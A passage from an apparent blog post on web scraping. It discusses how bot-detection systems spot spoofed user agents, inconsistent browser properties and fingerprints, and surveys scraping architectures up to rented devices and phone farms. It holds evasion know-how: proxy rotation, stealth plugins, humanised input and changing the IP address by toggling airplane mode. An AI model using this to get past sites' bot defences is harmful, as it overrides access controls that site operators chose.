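function findNavigatorInconsistencies(nav) {
  const issues = [];
  // In Chrome and Safari, appVersion is the user agent without the "Mozilla/" prefix.
  if ('Mozilla/' + nav.appVersion !== nav.userAgent) {
    issues.push('appVersion does not match userAgent');
  }
  // A user agent that claims to be an iPhone should come with platform "iPhone".
  const claimsIphone = nav.userAgent.includes('iPhone');
  if (claimsIphone !== (nav.platform === 'iPhone')) {
    issues.push('platform does not match userAgent');
  }
  return issues;
}

const iphoneUa = 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1';
console.log(findNavigatorInconsistencies({
  userAgent: iphoneUa,
  appVersion: iphoneUa.slice('Mozilla/'.length),
  platform: 'Linux x86_64',
}));
</code></pre></div>
<p>In this example only the user agent and <code>appVersion</code> were spoofed, so the forgotten <code>platform</code> value gives the browser away.</p>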
<p>It is much harder to fix the following things to behave like a true iPhone device:</p>
<ul>
<li>WebGL rendering and audio fingerprints</li>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/API/Permissions_API">Permissions API</a>: iOS devices have very specific permission restrictions</li>
<li>Correct <a href="https://developer.mozilla.org/en-US/docs/Web/API/Screen">screen dimensions</a>. And I mean ALL OF THEM.</li>
<li>mobile touch events emulation</li>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/API/Battery_Status_API">battery status API</a></li>
<li><code>deviceorientation</code> and <code>devicemotion</code> events </li>
</ul>
<p>And there are many other APIs that behave differently on an iPhone compared to other mobile devices.</p>
<p>The following websites are quite good at detecting such inconsistencies:</p>
<ol>
<li><a href="https://abrahamjuliot.github.io/creepjs/">creepjs</a></li>
<li><a href="http://pixelscan.net/checkproxy/">pixelscan.net</a></li>
<li><a href="https://bot.incolumitas.com/">bot.incolumitas.com</a> (yeah I know)</li>
</ol>
<p>It is just extremely hard to convincingly pretend you are an iPhone when in reality you are a headless chrome browser in some cloud infrastructure.</p>
<p>For example, when you run the following code:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="p">{</span> <span class="nx">webkit</span><span class="p">,</span> <span class="nx">devices</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'playwright'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">androidDevice</span> <span class="o">=</span> <span class="nx">devices</span><span class="p">[</span><span class="s1">'Pixel 2 XL'</span><span class="p">];</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">webkit</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span><span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">});</span>
<span class="kd">const</span> <span class="nx">context</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newContext</span><span class="p">({</span>
<span class="p">...</span><span class="nx">androidDevice</span><span class="p">,</span>
<span class="nx">locale</span><span class="o">:</span> <span class="s1">'en-US'</span><span class="p">,</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">context</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://bot.incolumitas.com/'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">screenshot</span><span class="p">({</span> <span class="nx">path</span><span class="o">:</span> <span class="s1">'botOrNot.png'</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<p>you will find many cues as to why the user agent can't possibly be a real Pixel smartphone.</p>
<p>What to do instead? </p>
<p>I'd suggest not lying about the user agent that you <em>truly</em> are. If your automated browser is running on a Linux system in the cloud, don't alter your user agent. Although Linux systems are quite rare in the wild, they are still legit user agents that websites should not block.</p>
<h3 id="speed">2. Don't scrape too aggressively</h3>
<p>This is another common mistake I see people making. Don't scrape too aggressively. After all, you are interested in public data; you don't want to launch a Denial of Service attack against a website. So please be considerate.</p>
<p>Furthermore, if your scraping becomes a major pain for the website's administrators, they will be extra careful to block all illegitimate traffic.</p>
<p>So it's better to throttle your scraping and to stay below the radar.</p>
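<p>Throttling can be as simple as fetching pages one after another with a randomized pause in between. The following is a minimal sketch, not a production scheduler: <code>scrapePolitely</code> is a hypothetical function, and <code>fetchOne</code> is a placeholder for whatever function actually loads a page.</p>
<div class="highlight"><pre><span></span><code>// Resolve after the given number of milliseconds.
const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

// Hypothetical helper: sequential scraping with a randomized pause between requests.
async function scrapePolitely(urls, fetchOne, minDelayMs, jitterMs) {
  const results = [];
  for (const [index, url] of urls.entries()) {
    if (index > 0) {
      // Wait at least minDelayMs, plus a random extra so requests are not evenly spaced.
      await sleep(minDelayMs + Math.random() * jitterMs);
    }
    results.push(await fetchOne(url));
  }
  return results;
}
</code></pre></div>
<p>A call such as <code>scrapePolitely(urls, loadPage, 2000, 3000)</code> would then wait between two and five seconds between requests, where <code>loadPage</code> is again a placeholder. Sensible delays depend on the target site.</p>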
<h3 id="serverless">3. Pick the right choice of scraping/crawling architecture that matches your needs</h3>
<p>In the past, I used <a href="https://aws.amazon.com/lambda/">AWS Lambda</a> for many larger scraping projects. I managed to scrape millions of Google SERPs within days on AWS Lambda (Even without any external proxies. Just by using the AWS Lambda public IP address pool, I was good to go).</p>
<p>There exist <a href="https://github.com/alixaxel/chrome-aws-lambda">mature Node.js modules</a> that ship chromium binaries specifically compiled for the AWS Lambda runtime.</p>
<p>But in order to run the chrome browser on AWS Lambda, you need to launch the chrome browser with many special <a href="https://github.com/alixaxel/chrome-aws-lambda/blob/master/source/index.js">command line arguments</a>:</p>
<div class="highlight"><pre><span></span><code><span class="cm">/**</span>
<span class="cm"> * Returns a list of recommended additional Chromium flags.</span>
<span class="cm"> */</span>
<span class="k">static</span> <span class="nx">get</span> <span class="nx">args</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'--autoplay-policy=user-gesture-required'</span><span class="p">,</span>
<span class="s1">'--disable-background-networking'</span><span class="p">,</span>
<span class="s1">'--disable-background-timer-throttling'</span><span class="p">,</span>
<span class="s1">'--disable-backgrounding-occluded-windows'</span><span class="p">,</span>
<span class="s1">'--disable-breakpad'</span><span class="p">,</span>
<span class="s1">'--disable-client-side-phishing-detection'</span><span class="p">,</span>
<span class="s1">'--disable-component-update'</span><span class="p">,</span>
<span class="s1">'--disable-default-apps'</span><span class="p">,</span>
<span class="s1">'--disable-dev-shm-usage'</span><span class="p">,</span>
<span class="s1">'--disable-domain-reliability'</span><span class="p">,</span>
<span class="s1">'--disable-extensions'</span><span class="p">,</span>
<span class="s1">'--disable-features=AudioServiceOutOfProcess'</span><span class="p">,</span>
<span class="s1">'--disable-hang-monitor'</span><span class="p">,</span>
<span class="s1">'--disable-ipc-flooding-protection'</span><span class="p">,</span>
<span class="s1">'--disable-notifications'</span><span class="p">,</span>
<span class="s1">'--disable-offer-store-unmasked-wallet-cards'</span><span class="p">,</span>
<span class="s1">'--disable-popup-blocking'</span><span class="p">,</span>
<span class="s1">'--disable-print-preview'</span><span class="p">,</span>
<span class="s1">'--disable-prompt-on-repost'</span><span class="p">,</span>
<span class="s1">'--disable-renderer-backgrounding'</span><span class="p">,</span>
<span class="s1">'--disable-setuid-sandbox'</span><span class="p">,</span>
<span class="s1">'--disable-speech-api'</span><span class="p">,</span>
<span class="s1">'--disable-sync'</span><span class="p">,</span>
<span class="s1">'--disk-cache-size=33554432'</span><span class="p">,</span>
<span class="s1">'--hide-scrollbars'</span><span class="p">,</span>
<span class="s1">'--ignore-gpu-blocklist'</span><span class="p">,</span>
<span class="s1">'--metrics-recording-only'</span><span class="p">,</span>
<span class="s1">'--mute-audio'</span><span class="p">,</span>
<span class="s1">'--no-default-browser-check'</span><span class="p">,</span>
<span class="s1">'--no-first-run'</span><span class="p">,</span>
<span class="s1">'--no-pings'</span><span class="p">,</span>
<span class="s1">'--no-sandbox'</span><span class="p">,</span>
<span class="s1">'--no-zygote'</span><span class="p">,</span>
<span class="s1">'--password-store=basic'</span><span class="p">,</span>
<span class="s1">'--use-gl=swiftshader'</span><span class="p">,</span>
<span class="s1">'--use-mock-keychain'</span><span class="p">,</span>
<span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">Chromium</span><span class="p">.</span><span class="nx">headless</span> <span class="o">===</span> <span class="kc">true</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">result</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'--single-process'</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">result</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="s1">'--start-maximized'</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">result</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>I am quite positive that normal Chrome browsers are not launched with those command line arguments and that the websites being visited can detect at least some of those settings.</p>
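<p>One flag from the list that tends to leak is <code>--use-gl=swiftshader</code>, which makes Chromium render WebGL in software. The sketch below assumes that software rendering shows up as "SwiftShader" (or "llvmpipe" for Mesa) in the <code>UNMASKED_RENDERER_WEBGL</code> string; the exact strings vary between versions, and <code>looksLikeSoftwareRenderer</code> is a hypothetical helper.</p>
<div class="highlight"><pre><span></span><code>// Hypothetical check on the string returned for UNMASKED_RENDERER_WEBGL.
// Assumption: software renderers identify themselves by name in that string.
function looksLikeSoftwareRenderer(renderer) {
  return /swiftshader|llvmpipe/i.test(renderer);
}

console.log(looksLikeSoftwareRenderer('Google SwiftShader'));
</code></pre></div>
<p>A browser that claims to run on a consumer laptop but renders WebGL without a GPU is at least worth a second look.</p>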
<p>Furthermore, there are just too many disadvantages when scraping with AWS Lambda:</p>
<ul>
<li>The lambda runtime is very restrictive</li>
<li>You have to test every feature twice before it works on AWS Lambda</li>
<li>It is more expensive than self-managed VPS servers</li>
<li>It is a major pain in the ass for debugging</li>
<li>Deployments eat up quite some time </li>
</ul>
<p>In the long run, those disadvantages kill the two or three plus points that lambda brings to the table:</p>
<ul>
<li>AWS Lambda reuses warm execution environments, which reduces cold starts</li>
<li>You only pay for what you use</li>
<li>You do not have to manage servers yourself</li>
</ul>
<h4>How should I set up my scraping/crawling infrastructure then?</h4>
<p>It depends on how strong the anti bot defense of the site you are trying to scrape is.</p>
<p>Nowadays, I would instead suggest using something like a proper <a href="https://github.com/browserless/chrome">Google Chrome Docker Image</a> together with a cluster management toolchain such as <a href="https://docs.docker.com/engine/swarm/">Docker Swarm</a> or <a href="https://kubernetes.io/">Kubernetes</a>, and renting additional VPS servers as scraping demand increases. Maybe you can use <a href="https://rancher.com/">Rancher</a> and its many VPS vendor integrations to speed up cluster deployments.</p>
<p>Some propositions for possible scraping/crawling architectures in order of increasing anti scraping measures:</p>
<ol>
<li>
<p><strong>No Scraping Defenses</strong> - Use <code>curl</code> and switch User-Agents and other HTTP Headers once in a while...</p>
</li>
<li>
<p><strong>Easy Scraping Target</strong> - If the website is relatively easy to scrape, use AWS Lambda + <a href="https://github.com/alixaxel/chrome-aws-lambda">chrome-aws-lambda</a> (with the shipped chromium compiled for the AWS runtime) + <a href="https://www.npmjs.com/package/puppeteer-extra-plugin-stealth">plugin-stealth</a> + some proxy provider</p>
</li>
<li>
<p><strong>Some Anti Scraping Defense</strong> - If you need a real Google Chrome browser <a href="https://github.com/berstend/puppeteer-extra/wiki/Using-Google-Chrome-instead-of-Chromium">for more stealth</a>, use a Docker Image such as the one from <a href="https://github.com/browserless/chrome">browserless.io</a> and rent VPS servers from a provider such as Digitalocean, AWS EC2 or Hetzner. You can use the raw <a href="https://chromedevtools.github.io/devtools-protocol/">Chrome DevTools Protocol (CDP)</a> for automation.
A good collection of tools that use the CDP <a href="https://github.com/ChromeDevTools/awesome-chrome-devtools">can be found here</a>. Furthermore, you can simulate mouse movements and keyboard events with a UI automation library such as <a href="https://pyautogui.readthedocs.io/en/latest/">PyAutoGUI</a>. Your Docker image should also launch a virtual frame buffer such as <a href="https://www.x.org/releases/X11R7.6/doc/man/man1/Xvfb.1.xhtml">Xvfb</a> to simulate a graphical user interface.</p>
</li>
<li>
<p><strong>Advanced Anti Scraping Defense</strong> - If the above setup is still not enough, you can rent physical devices and conduct your scraping there. You can rent real devices for browser testing on sites such as <a href="https://www.browserstack.com/">browserstack.com</a> or <a href="https://aws.amazon.com/device-farm/">AWS Device Farm</a>. It's best to also rent proxies, since the default IP addresses are probably already flagged.</p>
</li>
<li>
<p><strong>Brutal Anti Scraping Defense</strong> - As a final measure, if all of the above fails, you could of course buy your own collection of Android mobile devices and add a cheap mobile data plan to each. Then there is nothing to block, because you are a real device after all and do not pretend to be something else ;) You can buy <a href="https://www.amazon.com/RCA-Android-Unlocked-Smartphone-Black/dp/B086G9NF1P/">cheap Android devices</a> starting from 69 USD and a simple 10 GB data plan should not cost more than 10 USD a month. You can then install a lightweight Android distribution such as <a href="https://www.android.com/versions/go-edition/">Android Go</a> and then you are good to go.
With a 4G connection, your IP address is automatically changed whenever you switch Airplane mode on/off. I currently do not have an exact idea how to automate the scraping there, but it looks like <a href="https://appium.io/">appium.io</a> might be a solution. Anyhow, it is important to humanize all interactions with the browser/apps there as well.</p>
</li>
</ol>
<h3 id="mistakes">4. Learn from Mistakes from Professional Scraping Services</h3>
<p>There are many professional scraping services that you can research. They have learned over the years and you can see how they camouflage their scrapers. Sometimes even the professional services make mistakes though.</p>
<h4><a href="https://scrapingbee.com">ScrapingBee</a></h4>
<p>For example, they set the user agent to either</p>
<ol>
<li><em>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36</em></li>
</ol>
<p>but they forget to spoof the <code>navigator.platform</code> property accordingly. It is still set to <code>"platform": "Linux x86_64"</code>. Obviously, that is very suspicious and would get flagged by many bot detection systems.</p>
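<p>A detection script could check this mismatch roughly as follows. This is only a minimal sketch: the function names and the User-Agent patterns are my own assumptions for illustration and are by no means exhaustive.</p>

```javascript
// Map a User-Agent string to the navigator.platform prefix one would expect.
// The patterns are illustrative assumptions, not a complete list.
function expectedPlatformPrefix(userAgent) {
  if (/Windows NT/.test(userAgent)) return 'Win';
  if (/Macintosh/.test(userAgent)) return 'Mac';
  if (/Android|Linux/.test(userAgent)) return 'Linux';
  return null; // unknown operating system, so no expectation
}

// Returns false when the claimed User-Agent and the platform contradict each other.
function platformMatchesUserAgent(userAgent, platform) {
  const prefix = expectedPlatformPrefix(userAgent);
  return prefix === null || platform.startsWith(prefix);
}

// In a browser:
// platformMatchesUserAgent(navigator.userAgent, navigator.platform)
```

<p>With the two User-Agents above and the platform <code>Linux x86_64</code>, the check returns <code>false</code> in both cases.</p>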
<h4><a href="https://www.scraperapi.com/">scraperapi.com</a></h4>
<p>This is another commercial scraping service. Their scrapers also exhibit some weird behavior.</p>
<p>For example, their scraping browsers have the timezone set to <code>Etc/Unknown</code>. This is very obscure.</p>
<p>You can obtain the timezone with the JavaScript snippet <code>(new window.Intl.DateTimeFormat).resolvedOptions().timeZone</code>. </p>
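<p>Wrapped into a small check, this could look like the sketch below. The helper names are hypothetical, and which values count as suspicious is my own assumption; here only a missing timezone and <code>Etc/Unknown</code> are flagged.</p>

```javascript
// Read the IANA timezone name the JavaScript engine reports.
function getTimezone() {
  return new Intl.DateTimeFormat().resolvedOptions().timeZone;
}

// Assumption: a missing value or "Etc/Unknown" is treated as suspicious.
function isSuspiciousTimezone(timeZone) {
  return !timeZone || timeZone === 'Etc/Unknown';
}

// Usage: isSuspiciousTimezone(getTimezone())
```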
<p>Furthermore, the scraperapi.com scrapers have no WebGL support. It is not possible to obtain the video card settings.</p>
<p>Usually, normal browsers have a video card such as:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"videoCard"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Intel Inc."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Intel Iris OpenGL Engine"</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>You can obtain your video card brand names with the following script:</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="kd">function</span> <span class="nx">getVideoCardInfo</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">gl</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'canvas'</span><span class="p">).</span><span class="nx">getContext</span><span class="p">(</span><span class="s1">'webgl'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">gl</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">error</span><span class="o">:</span> <span class="s2">"no webgl"</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">debugInfo</span> <span class="o">=</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getExtension</span><span class="p">(</span><span class="s1">'WEBGL_debug_renderer_info'</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">){</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">vendor</span><span class="o">:</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getParameter</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">.</span><span class="nx">UNMASKED_VENDOR_WEBGL</span><span class="p">),</span>
<span class="nx">renderer</span><span class="o">:</span> <span class="nx">gl</span><span class="p">.</span><span class="nx">getParameter</span><span class="p">(</span><span class="nx">debugInfo</span><span class="p">.</span><span class="nx">UNMASKED_RENDERER_WEBGL</span><span class="p">),</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">error</span><span class="o">:</span> <span class="s2">"no WEBGL_debug_renderer_info"</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">})()</span>
</code></pre></div>
<h4><a href="https://scrapingrobot.com">scrapingrobot.com</a></h4>
<p>Some issues with scrapingrobot.com are the following:</p>
<p>The scrapers of scrapingrobot.com are using the following screen size properties:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"dimensions"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.outerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">800</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.outerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">600</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.innerWidth"</span><span class="p">:</span><span class="w"> </span><span class="mi">2470</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.innerHeight"</span><span class="p">:</span><span class="w"> </span><span class="mi">1340</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.screen.width"</span><span class="p">:</span><span class="w"> </span><span class="mi">2560</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"window.screen.height"</span><span class="p">:</span><span class="w"> </span><span class="mi">1440</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>It should not be the case that the <code>window.outerWidth</code> and <code>window.outerHeight</code> properties are smaller than
the <code>window.innerWidth</code> and <code>window.innerHeight</code> properties. This is a very strong indication
that the browser was messed with.</p>
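<p>Such a consistency check is easy to script. The following is a rough sketch with a hypothetical function name. Keep in mind that page zoom can shift these values in some browsers, so the result is better treated as a signal than as proof.</p>

```javascript
// Collect inconsistencies between inner and outer window dimensions.
// `d` is a plain object so the check can also run on logged data.
function findDimensionInconsistencies(d) {
  const issues = [];
  if (d.innerWidth > d.outerWidth) issues.push('innerWidth > outerWidth');
  if (d.innerHeight > d.outerHeight) issues.push('innerHeight > outerHeight');
  return issues;
}

// In a browser:
// findDimensionInconsistencies({
//   innerWidth: window.innerWidth, innerHeight: window.innerHeight,
//   outerWidth: window.outerWidth, outerHeight: window.outerHeight,
// });
```

<p>For the values recorded above (outer 800x600, inner 2470x1340), both checks trigger.</p>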
<p>Furthermore, their scrapers don't have any plugin information (<code>navigator.plugins</code>) associated with them. This is very uncommon for legit
Chrome browsers. Usually, every Chrome browser has standard plugin information such as</p>
<div class="highlight"><pre><span></span><code><span class="nt">"plugins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Chrome PDF Plugin"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Portable Document Format"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/x-google-chrome-pdf"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">"pdf"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Chrome PDF Viewer"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/pdf"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">"pdf"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Native Client"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/x-nacl"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"suffixes"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>With <code>scrapingrobot.com</code>, this information looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"plugins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"mimeType"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
</code></pre></div>
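<p>A plugin listing like the ones above can be collected with a few lines of JavaScript. This is a sketch under assumptions: the function names are made up, only the first MIME type of each plugin is read, and what counts as "broken" is my own choice.</p>

```javascript
// Turn navigator.plugins (an array-like PluginArray) into plain objects.
function describePlugins(plugins) {
  return Array.from(plugins).map((plugin) => {
    const mime = plugin[0]; // first MimeType entry of the plugin, if any
    return {
      name: plugin.name,
      description: plugin.description,
      mimeType: mime ? { type: mime.type, suffixes: mime.suffixes } : null,
    };
  });
}

// Assumption: an empty list, a plugin without a name or one without
// a MIME type is treated as a sign of a tampered browser.
function hasBrokenPlugins(plugins) {
  const described = describePlugins(plugins);
  return described.length === 0 ||
    described.some((p) => !p.name || p.mimeType === null);
}

// In a browser: hasBrokenPlugins(navigator.plugins)
```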
<p>Another issue with the scrapers of <code>scrapingrobot.com</code> is that they don't have any multimedia devices (<code>navigator.mediaDevices</code>) associated with the browser. Usually, a normal browser has at least one multimedia device associated (such as speakers, microphones or webcams).</p>
<p>Normal:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"multimediaDevices"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"speakers"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"micros"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"webcams"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>scrapingrobot.com:</p>
<div class="highlight"><pre><span></span><code><span class="nt">"multimediaDevices"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"speakers"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"micros"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"webcams"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
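<p>Counts like these can be derived from <code>navigator.mediaDevices.enumerateDevices()</code>. The sketch below uses a hypothetical helper name and reuses the key names from the output above.</p>

```javascript
// Count devices by kind. `devices` is the list that
// navigator.mediaDevices.enumerateDevices() resolves to.
function countMediaDevices(devices) {
  const counts = { speakers: 0, micros: 0, webcams: 0 };
  for (const device of devices) {
    if (device.kind === 'audiooutput') counts.speakers += 1;
    else if (device.kind === 'audioinput') counts.micros += 1;
    else if (device.kind === 'videoinput') counts.webcams += 1;
  }
  return counts;
}

// In a browser (requires a secure context):
// navigator.mediaDevices.enumerateDevices()
//   .then((devices) => console.log(countMediaDevices(devices)));
```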
<h3 id="fingerprinting">5. Don't disregard Fingerprinting</h3>
<p>Scraping is so hard because there are endless ways to fingerprint a device. You can fingerprint devices on the following levels:</p>
<ol>
<li><strong>TCP/IP fingerprinting</strong> (for example with <a href="https://lcamtuf.coredump.cx/p0f3/">p0f</a>)</li>
<li><strong>TLS fingerprinting</strong> (for example with <a href="https://github.com/salesforce/ja3">ja3</a>)</li>
<li><strong>Browser/JavaScript fingerprinting</strong> (for example with <a href="https://github.com/fingerprintjs/fingerprintjs">fingerprintjs2</a>)</li>
<li>HTTP header fingerprinting</li>
<li>... and probably many other layers where fingerprinting is applicable</li>
</ol>
<p>But why is fingerprinting so relevant for scraping?</p>
<p>Remember, when you want to create a scraper that is able to request a certain website many thousands of times in a short time, your
overall goal is for your scraping traffic to appear organic and human-like.</p>
<p>Put differently, your goal is to make it as hard as possible to cluster and correlate your scraping user agents into groups.</p>
<p>That is also the reason why you are using proxies. Each scraper instance changes its IP address after a couple of requests (sometimes as few as 20).</p>
<p>But what happens if you request a certain website 1.000.000 times and you change the IP address on every 500th request? Then the website cannot reasonably block you on the IP address level, but it can infer that you are still the very same device, because most likely your browser fingerprint does not change when the IP address changes.</p>
<p>See? </p>
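<p>On the server side, this correlation could look like the following sketch. The log format (objects with an <code>ip</code> and a <code>fingerprint</code> field) and the function name are assumptions made purely for illustration.</p>

```javascript
// Group request log entries by browser fingerprint and remember
// how many requests and distinct IP addresses each fingerprint used.
function clusterByFingerprint(requests) {
  const clusters = new Map();
  for (const { ip, fingerprint } of requests) {
    if (!clusters.has(fingerprint)) {
      clusters.set(fingerprint, { requests: 0, ips: new Set() });
    }
    const cluster = clusters.get(fingerprint);
    cluster.requests += 1;
    cluster.ips.add(ip);
  }
  return clusters;
}

// Hypothetical log: one device rotating through three proxies.
const clusters = clusterByFingerprint([
  { ip: '198.51.100.1', fingerprint: 'abc' },
  { ip: '198.51.100.2', fingerprint: 'abc' },
  { ip: '198.51.100.3', fingerprint: 'abc' },
  { ip: '203.0.113.9', fingerprint: 'xyz' },
]);
console.log(clusters.get('abc').ips.size); // number of IPs behind one fingerprint
```

<p>A single fingerprint that shows up behind many different IP addresses is exactly the cluster you do not want to form.</p>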
<p>So what exactly constitutes a good fingerprint?</p>
<p><strong>A good fingerprint needs to have as much entropy as possible, while at the same time aiming to be resilient against minor changes!</strong> </p>
